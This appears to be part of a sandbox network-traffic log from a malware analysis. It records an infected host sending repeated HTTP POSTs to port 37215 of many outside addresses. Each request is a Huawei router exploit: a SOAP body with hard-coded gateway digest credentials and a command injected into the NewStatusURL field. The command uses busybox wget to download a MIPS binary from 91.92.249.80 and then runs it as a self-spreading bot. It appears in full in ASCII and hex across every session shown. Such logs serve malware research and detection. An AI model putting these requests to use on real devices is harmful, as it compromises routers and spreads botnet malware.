                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1108192.168.2.2335426157.50.134.13637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299259901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1109192.168.2.2346844197.248.228.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299283028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1110192.168.2.2345706157.49.215.2037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299309015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1111192.168.2.235996841.31.13.12837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299314976 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1112192.168.2.2354182157.82.49.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299343109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1113192.168.2.2341358157.214.30.20337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299345016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1114192.168.2.2354318118.153.150.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299376011 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1115192.168.2.2337554197.108.142.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299386978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1116192.168.2.2357174219.209.93.25037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299386978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1117192.168.2.2339814157.139.115.16237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299406052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1118192.168.2.2353502157.12.175.19337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299423933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
